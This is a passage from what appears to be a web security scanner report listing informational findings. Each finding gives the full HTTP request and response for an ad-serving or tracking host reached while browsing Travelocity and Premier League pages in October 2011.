Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CFJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBe; PRgo=BBBAAsJvCBVBF4FRCDhFS!B; PRimp=59AE0400-B34A-1C1C-0309-3510048A0101; PRca=|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#; PRpc=|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 02 Oct 2011 23:49:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4218
Set-Cookie:PRvt=CGJ9xErENUwPwYAcUBBeJ6TErNHYxA5IBd7BCeJ5DErTb9CAIFAC9BBeJ7WErTb9avgKAAGBBeJNRErllKsxwcASKBBeKG9ErlmC1SzbAB3BAe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvCBVBF4FRCDhFS!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=59AE0400-D582-DB2C-030A-1BD000770100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKlp*1278:2|AJoR*343:1|AKjB*15:2|AK9q*1646:2|AK73*1646:1|AKdX*1153:2|AKfC*298:1|AK8l*9320:1|AJtM*1737:2|AJsM*154:1|AKln*9320:3|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKlpAAUc:2|AJoRAAF7:1|AKjBAAF7:1|AKjBAAAP:1|AK9qAA08:2|AK73AA08:1|AKdXAASb:2|AKfCAAEo:1|AK8lAC0U:1|AJtMAA2B:2|AJsMAAC4:1|AKlnAC0U:3|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FsBu:2|FiNl:1|FwPI:1|FwO9:1|FeMB:1|FeMC:1|FdKz:1|FjZG:1|Fj1N:1|FnKl:1|Fgi2:1|FrMI:1|FrMW:1|F2Bj:1|FrlJ:3|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GWZl:2|Fz7o:1|GYaN:2|GRns:1|GRno:1|GRQ2:1|GUPB:1|GUPA:1|GVWz:1|GWPi:1|GJ9J:1|GMBD:1|GMud:1|GW7X:3|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FsBuGWZl:2|FiNlFz7o:1|FwPIGYaN:1|FwO9GYaN:1|FeMBGRns:1|FeMCGRno:1|FdKzGRQ2:1|FjZGGUPB:1|Fj1NGUPA:1|FnKlGVWz:1|Fgi2GWPi:1|FrMIGJ9J:1|FrMWGMBD:1|F2BjGMud:1|FrlJGW7X:3|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

27.9. http://amch.questionmarket.com/adscgen/st.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://amch.questionmarket.com
Path:   /adscgen/st.php

Request

GET /adscgen/st.php?survey_num=928398&site=69802575&code=44069375&randnum=823146 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1_923517-8-1_43741105-3-1_400008029877-5-1_43741102-3-1_43407814-6-1_43624044-35-1_43407795-6-1_41889545-5-1_41888765-5-2_41888152-5-1_43622021-3-1_43658050-41-1_43749713-14-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0_775029-3M.|M-0_913132-c5?|M-0_924563-#^>|M-Us_927907-{w@|M-0_926534-vu@|M-d6_910905-9d[}M-*_925788-AW'~M-0_928398-C|@~M-0_873769-]|@~M-0; LP=1317596202

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:55 GMT
Server: Apache/2.2.3
X-Powered-By: PHP/4.4.4
DL_S: b102.dl
P3P: CP="ALL DSP COR PSAa PSDa OUR IND COM NAV INT LOC OTC", policyref="http://ch.questionmarket.com/w3c/audit2007/p3p_DynamicLogic.xml"
Content-Length: 165
Content-Type: text/html

(function(){
if(1!=4){
(new Image).src="http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php?ord="+Math.floor((new Date()).getTime()/1000);


}
})();


27.10. http://aud.pubmatic.com/AdServer/Artemis

Summary

Severity:   Information
Confidence:   Certain
Host:   http://aud.pubmatic.com
Path:   /AdServer/Artemis

Request

GET /AdServer/Artemis?dpid=7&group=tech_business_professional&industry=software&location=texas HTTP/1.1
Host: aud.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/dppix.html?p=26071&s=26072&a=21044
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; KRTBCOOKIE_148=1699-uid:439524AE8C6B634E021F5F7802166020; KADUSERCOOKIE=55785307-A5DC-4E3A-B452-DDBD426D3A1D; KRTBCOOKIE_58=1344-OO-00000000000000000; KRTBCOOKIE_22=488-pcv:1|uid:2944787775510337379; KRTBCOOKIE_27=1216-uid:; KRTBCOOKIE_218=4056--5675633421699857517=; KRTBCOOKIE_200=3683-d0f5e0cea474; KRTBCOOKIE_16=226-3620501663059719663; pubtime_26072=TMC; KTPCACOOKIE=YES; KRTBCOOKIE_80=1336-f96ee651-9aaf-4db4-bcd2-102cf3b7c015.; PUBRETARGET=78_1409703834.82_1409705283.571_1410012888.806_1346872847.390_1323779603.445_1323779616.362_1318595605.76_1318595649.70_1318595646.2191_1331555757.2018_1318595758; pubfreq_26072=823-2:1098-2; PUBMDCID=1; pubfreq_26072_21044_238858273=823-1; PMDTSHR=cat:

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:13:00 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Connection: close
Content-Type: text/html
Content-Length: 7

success

27.11. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /0802A570-D4D3-11E0-8F5A-3A5C91016B62

Request

GET /0802A570-D4D3-11E0-8F5A-3A5C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home/0,,12306,00.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:01 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 13483

document.write('<style type="text/css"> div#p360-hybrid300x250TriadBlackBlue-0802A570-D4D3-11E0-8F5A-3A5C91016B62 { width: 300px; left: 0; font-family: sans-serif; position: relative; di
...[SNIP]...

27.12. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /D712CB66-D4D2-11E0-ACD9-355C91016B62

Request

GET /D712CB66-D4D2-11E0-ACD9-355C91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/Home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:58:10 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 1152

document.write('<style type="text/css">.p360_adunit { border: 1px solid #ffffff; width: 466px; height: 58px; background-color: #FFFFFF;}.p360_listing { font-size: 11px; font-family: arial, helv; heigh
...[SNIP]...

27.13. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.pulse360.com
Path:   /F09A1BDE-D4D2-11E0-99F0-875B91016B62

Request

GET /F09A1BDE-D4D2-11E0-99F0-875B91016B62 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.premierleague.com/page/SearchResults/?searchQuery=soccor+football+goal+tv+xss&page=2229476&page=2231401&page=2232085&page=2232088&page=2232090&page=2233530&order=date
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pulse360-opt-out=1

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:03 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 12893

document.write('<style type="text/css"> div#p360-hybrid120x600aquanotch-F09A1BDE-D4D2-11E0-99F0-875B91016B62 { width: 120px; left: 0; font-family: sans-serif; position: relative; display
...[SNIP]...

27.14. http://content1.admonkey.dapper.net/clients/expedia/Infosite_US.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content1.admonkey.dapper.net
Path:   /clients/expedia/Infosite_US.html

Request

GET /clients/expedia/Infosite_US.html HTTP/1.1
Host: content1.admonkey.dapper.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nausi164;u=CCF4A420AF8B480F8413EFB42E880287;u16=USD;u13=4215;u14=429;u11=35;u9=The%20Boston%20Park%20Plaza%20Hotel%20&%20Towers;u7=1%7C0;u6=1;u4=20111004%7C20111007;u1=Hotel;u2=178239;ord=691577950492.5012?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DAPPEROPTOUT2=OPT-OUT; expedia_bucket=a

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Mon, 03 Oct 2011 00:14:22 GMT
Content-Type: text/html
Connection: keep-alive
ETag: "a123520f93f435158bffb3b4123e3d12"
X-CF1: fA.lax1:cf:cacheC.lax1-01
Last-Modified: Fri, 03 Jun 2011 22:13:07 GMT
X-CF2: L
Content-Length: 2555

<html>
<body>
<script type='text/javascript'>

var cookieTTL = 365; // TTL in days

// var COOKIE_NAME = intent.getFieldValue("adId") + '_bucket';
var COOKIE_NAME = "expedia" + '_bucket';

function lo
...[SNIP]...

27.15. http://content1.admonkey.dapper.net/clients/expedia/SearchResults_US.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content1.admonkey.dapper.net
Path:   /clients/expedia/SearchResults_US.html

Request

GET /clients/expedia/SearchResults_US.html HTTP/1.1
Host: content1.admonkey.dapper.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://fls.doubleclick.net/activityi;src=2588783;type=nausc547;cat=nauss482;ord=2134735815;u=ccf4a420af8b480f8413efb42e880287;u1=Hotel;u2=178239;u4=20111004%7C20111007;u6=1;u7=1%7C0;u9=;u11=0;u12=;u13=4215%7C15861%7C23415%7C1680030%7C2800816;u14=429.0%7C339.15%7C289.0%7C432.33%7C308.54;u16=USD
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DAPPEROPTOUT2=OPT-OUT

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Mon, 03 Oct 2011 00:11:44 GMT
Content-Type: text/html
Connection: keep-alive
ETag: "9ef694aa7b1cbe82215254ec01ccb883"
X-CF1: fF.lax1:cf:cacheB.lax1-01
Last-Modified: Mon, 06 Jun 2011 20:17:35 GMT
X-CF2: L
Content-Length: 5454

<html>
<head>

<script type="text/javascript">
//<!--
// var COOKIE_NAME = intent.getFieldValue("adId") + '_bucket';
var COOKIE_NAME = "expedia" + '_bucket';
var cookieTTL = 365; // TTL in days

try
...[SNIP]...

27.16. http://d.xp1.ru4.com/meta

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /meta

Request

GET /meta?_o=179638&_t=cmcont&ssv_ptnr=pm HTTP/1.1
Host: d.xp1.ru4.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=26071&s=26072
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=OO-00000000000000000; 31041217-B31041253=2|31041263|0|0|0|31041234|31041231|-1; 66281-B66290=3|0|0|0|0|66286|110253|-1

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Mon, 03 Oct 2011 00:12:54 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Expires: Mon, 01-Jan-2010 12:00:00 GMT
Pragma: no-cache
Set-cookie: 1780853-B1781017=3|1781033|0|0|0|1781015|22810441|-1; domain=.ru4.com; path=/
Content-type: text/html
Content-length: 1295
X-Cnection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent">
<script type="text
...[SNIP]...

27.17. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771877&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:26 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:14:26 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2262
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...

27.18. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=1&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&stars=4.0&hotel=omni_hotels&random=656365&tile=564238840132219&section=details HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelDetail.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?tab=guide&tripType=hotel&propertyId=4810&airport=BOS&resetReview=true&hotelQKey=-2237575859332798600&tsHotelQKey=-2237575859332798600&reviewPage=reviewStart&locLink=HOTEL.HOTELAVAILABILITYLISTLITE1|NAT1&dr=4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998; mbox=session#1317600481056-80236#1317602524|PC#1317600481056-80236.19#1318810264|check#true#1317600724

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:12:46 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:12:46 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 2276
Content-Type: text/html

<IFRAME SRC="http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2;sz=160x600;click=http://dm.travelocity.com/event.ng/Type%3dclick%26FlightID%3d127075%26AdID%3d169968%26TargetID%3d32592
...[SNIP]...

27.19. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=529176&tile=711446054649628&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617?Service=TRAVELOCITY&SEQ=1317600526540922011&pathIndicator=HOTEL_FRONTDOOR&leavingDate=mm/dd/yyyy&returningDate=mm/dd/yyyy&city=bos&cityCountryCode=US&dateFormat=mm/dd/yyyy&searchMode=city&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; IPE_S_TMP_910=910; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=check#true#1317600587|session#1317600481056-80236#1317602387|PC#1317600481056-80236.19#1318810127; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.1.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:09:01 GMT
Server: Apache
X-Server: prdlmn0408
AdServer: 10.28.75.14:9678:1
P3P: policyref="http://dm.travelocity.com/w3c/p3p.xml", CP="ALL DSP COR CUR ADM DEVo CONi OUR DEL IND PHY DEM ONL PRE INT PUR CNT UNI NAV COM"
Cache-Control: max-age=0, no-cache
Expires: Mon, 03 Oct 2011 00:09:01 GMT
Vary: Accept-Encoding,User-Agent
Pragma: no-cache
Content-Length: 239
Content-Type: text/html

<script type="text/javascript">
var pubId=26071;
var siteId=26072;
var kadId=21044;
var kadwidth=160;
var kadheight=600;
var kadtype=1;
</script>
<script type="text/javascript" src="http://ads.pubmati
...[SNIP]...

27.20. http://dm.travelocity.com/html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dm.travelocity.com
Path:   /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results

Request

GET /html.ng/adsize=160x600&site=travelocity&cobrand=TRAVELOCITY&locale=en&pagepos=2&area=hotel&dest=BOS&paxa=0&paxs=0&paxc=0&random=771875&tile=128609801075344&section=results HTTP/1.1
Host: dm.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://travel.travelocity.com/hotel/HotelAvailability.do;jsessionid=74C1C04EA1B1607D7CD2E1313B9B2779.p0617
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; SID=T000V00000X401118380170533249023416102; NGUserID=a1c4b0d-32323-499133968-1317600484; JSID=74C1C04EA1B1607D7CD2E1313B9B2779.p0617; TUID=b93762e7-3915-4de7-8fff-bd2729b35e5e; Service=TRAVELOCITY; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; mbox=session#1317600481056-80236#1317602632|PC#1317600481056-80236.19#1318810372|check#true#1317600832; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.3.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:14:28 GMT
Server: Apache
X-Server: prdlmn2714
AdServer: 10.28.75.14:9678:1
